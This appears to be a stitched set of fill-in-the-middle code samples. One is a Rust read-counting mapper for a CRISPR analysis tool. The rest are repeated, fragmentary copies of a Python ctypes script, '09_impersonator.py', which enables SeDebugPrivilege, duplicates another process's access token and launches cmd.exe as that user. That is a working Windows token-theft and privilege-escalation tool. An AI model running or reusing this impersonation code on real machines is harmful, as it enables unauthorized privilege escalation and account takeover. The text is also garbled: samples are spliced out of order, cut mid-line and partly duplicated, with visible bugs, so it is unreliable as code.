Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && found_mismatch || mismatch_in_pattern && !found_mismatch;
if !skip {
// build / expand cigar string, e.g. 20M -> MMMMMMMMMMMMMMMMMMMM, 10M,1I,5D ->
// MMMMMMMMMMIDDDDD, 20M1D =
let mut match_string = String::new();
for caps in match_string_re.captures_iter(&al_arr[5]) {
//println!("{}", &caps[1]);
let until_pos: i32 = caps[1].parse().expect("programmer error: cannot convert string to number for iterating");
for _ in 0..until_pos {
match_string.push_str(&caps[2]);
}
}
// now introduce mismatches int the string if needed
if found_mismatch {
for pos in mm_positions {
// TODO: next line is not compiling
match_string.insert_str(pos, "X");
}
}
// now apply input mapping regex
if mapping_match_re.is_match(&match_string) {
count_matched += 1;
match gene_matches.get_mut(al_arr[2].split("_").nth(0).unwrap()) {
Some(v) => *v += 1,
None => println!("illegal gene id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
//ref_libIds.get(&x).ok_or("illegal gene id encountered").map(|v| v += 1);
match ref_libIds.get_mut(&al_arr[2].to_owned().clone()) { | }
}
// --------- end of basic algorithm ---
}
// (mapped_geneids, count_total)
(count_total, count_matched)
} | Some(v) => *v += 1,
None => println!("illegal reference lib id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
} | random_line_split |
main.rs | // #![feature(alloc_system)]
// extern crate alloc_system;
extern crate regex;
extern crate argparse;
use regex::Regex;
use std::fs::File;
use argparse::{ArgumentParser, Store};
use std::collections::HashSet;
use std::collections::BTreeMap;
use std::io::{BufReader, BufRead, BufWriter, Write};
// print $seqgene "Gene\tCount\tdesigns-present\n";
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// open ($stats, ">", $logfile) or die $!;
// print $stats "Total\tMatched\n";
// print $stats $counttotal . "\t" . $countmatched . "\n";
// close($stats);
fn main() {
// buffers to hold parsed arguments
let mut fasta_file_arg = String::new();
let mut sam_file_arg = String::new();
let mut mapping_match_pattern = String::from("M{20,21}$");
let mut geneid_pattern = String::from("_");
let mut logfile_out = String::from("./log.out");
// TODO: change argparse to clap as suggested by Jules
parse_args(&mut fasta_file_arg,
&mut sam_file_arg,
&mut mapping_match_pattern,
&mut geneid_pattern,
&mut logfile_out);
//let fasta_re = Regex::new(&format!(r"^>(.+){}", geneid_pattern))
let fasta_re = Regex::new(r"^>(.+)")
.expect("programmer error in accession regex");
let mismatch_in_pattern = mapping_match_pattern.contains('x') ||
mapping_match_pattern.contains('X');
let mut gene_matches = BTreeMap::<String, u32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn | (fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && found_mismatch || mismatch_in_pattern && !found_mismatch;
if !skip {
// build / expand cigar string, e.g. 20M -> MMMMMMMMMMMMMMMMMMMM, 10M,1I,5D ->
// MMMMMMMMMMIDDDDD, 20M1D =
let mut match_string = String::new();
for caps in match_string_re.captures_iter(&al_arr[5]) {
//println!("{}", &caps[1]);
let until_pos: i32 = caps[1].parse().expect("programmer error: cannot convert string to number for iterating");
for _ in 0..until_pos {
match_string.push_str(&caps[2]);
}
}
// now introduce mismatches int the string if needed
if found_mismatch {
for pos in mm_positions {
// TODO: next line is not compiling
match_string.insert_str(pos, "X");
}
}
// now apply input mapping regex
if mapping_match_re.is_match(&match_string) {
count_matched += 1;
match gene_matches.get_mut(al_arr[2].split("_").nth(0).unwrap()) {
Some(v) => *v += 1,
None => println!("illegal gene id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
//ref_libIds.get(&x).ok_or("illegal gene id encountered").map(|v| v += 1);
match ref_libIds.get_mut(&al_arr[2].to_owned().clone()) {
Some(v) => *v += 1,
None => println!("illegal reference lib id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
}
}
// --------- end of basic algorithm ---
}
// (mapped_geneids, count_total)
(count_total, count_matched)
}
| process_fasta | identifier_name |
09_impersonator.py | # impersonator.py
import ctypes
from ctypes.wintypes import DWORD,BOOL,HANDLE,LPWSTR,WORD,LPBYTE
# Handles
u_handle = ctypes.WinDLL("user32.dll")
k_handle = ctypes.WinDLL("kernel32.dll")
a_handle = ctypes.WinDLL("Advapi32.dll")
# Access Rights (Full Access Right Shortcut)
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
# Privilege Enabled Mask
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000
STANDARD_RIGHTS_READ = 0x00020000
TOKEN_ASSIGN_PRIMARY = 0x0001
TOKEN_DUPLICATE = 0x0002
TOKEN_IMPERSONATION = 0x0004
TOKEN_QUERY = 0x0008
TOKEN_QUERY_SOURCE = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class | (ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
]
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebugPrivilege on Current Process to be able to use token duplication
print("[INFO] Enabling SEDebugPrivilege on Current Process...")
response = enablePrivilege("SEDebugPrivilege", currentProcessHandle)
if response != 0:
print("[ERROR] Failed to Enable Privileges!")
exit(1)
# Duplicate Token On Hooked Process
hExistingToken = ctypes.c_void_p()
dwDesiredAccess = TOKEN_ALL_ACCESS
lpTokenAttributes = SECURITY_ATTRIBUTES()
ImpersonationLevel = 2 # Set to SecurityImpersonation Enum
TokenType = 1 # Set to Token_Type enum as Primary
# Configure the SECURITY_ATTRIBUTES Structure
lpTokenAttributes.bInheritHandle = False
lpTokenAttributes.lpSecurityDescriptor = ctypes.c_void_p()
lpTokenAttributes.nLength = ctypes.sizeof(lpTokenAttributes)
print("[INFO] Duplicating Token on Hooked Process...")
# Issue the Token Duplication Call
response = a_handle.DuplicateTokenEx(
TokenHandle,
dwDesiredAccess,
ctypes.byref(lpTokenAttributes),
ImpersonationLevel,
TokenType,
ctypes.byref(hExistingToken))
if response == 0:
print("[ERROR] Duplicating Token Failed [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
# Spawn a Process as the Impersonated User
# CreateProcessWithTokenW
hToken = hExistingToken
dwLogonFlags = 0x00000001 # Use the Flag LOGON_WITH_PROFILE
lpApplicationName = "C:\\Windows\\System32\\cmd.exe"
lpCommandLine = None
dwCreationFlags = 0x00000010 # Use the Flag CREATE_NEW_CONSOLE
lpEnvironment = ctypes.c_void_p()
lpCurrentDirectory = None
lpStartupInfo = STARTUPINFO()
lpProcessInformation = PROCESS_INFORMATION()
# StartupInfo (*If I don't sepcify the value, it will return as NULL)
lpStartupInfo.wShowWindow = 0x1 # Showing up Windows
lpStartupInfo.dwFlags = 0x1 # Use to flag to look at wShowWindow
lpStartupInfo.cb = ctypes.sizeof(lpStartupInfo)
response = a_handle.CreateProcessWithTokenW(
hToken,
dwLogonFlags,
lpApplicationName,
lpCommandLine,
dwCreationFlags,
lpEnvironment,
lpCurrentDirectory,
ctypes.byref(lpStartupInfo), # Pointer to STARTUPINFOA
ctypes.byref(lpProcessInformation)) # Pointer to PROCESS_INFORMATION
if response == 0:
print("[ERROR] Failed to Create a Process with Duplicated Token [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Created Impersonated Process!")
| PRIVILEGE_SET | identifier_name |
09_impersonator.py | # impersonator.py
import ctypes
from ctypes.wintypes import DWORD,BOOL,HANDLE,LPWSTR,WORD,LPBYTE
# Handles
u_handle = ctypes.WinDLL("user32.dll")
k_handle = ctypes.WinDLL("kernel32.dll")
a_handle = ctypes.WinDLL("Advapi32.dll")
# Access Rights (Full Access Right Shortcut)
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
# Privilege Enabled Mask
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000
STANDARD_RIGHTS_READ = 0x00020000
TOKEN_ASSIGN_PRIMARY = 0x0001
TOKEN_DUPLICATE = 0x0002
TOKEN_IMPERSONATION = 0x0004
TOKEN_QUERY = 0x0008
TOKEN_QUERY_SOURCE = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
]
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
|
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebugPrivilege on Current Process to be able to use token duplication
print("[INFO] Enabling SEDebugPrivilege on Current Process...")
response = enablePrivilege("SEDebugPrivilege", currentProcessHandle)
if response != 0:
print("[ERROR] Failed to Enable Privileges!")
exit(1)
# Duplicate Token On Hooked Process
hExistingToken = ctypes.c_void_p()
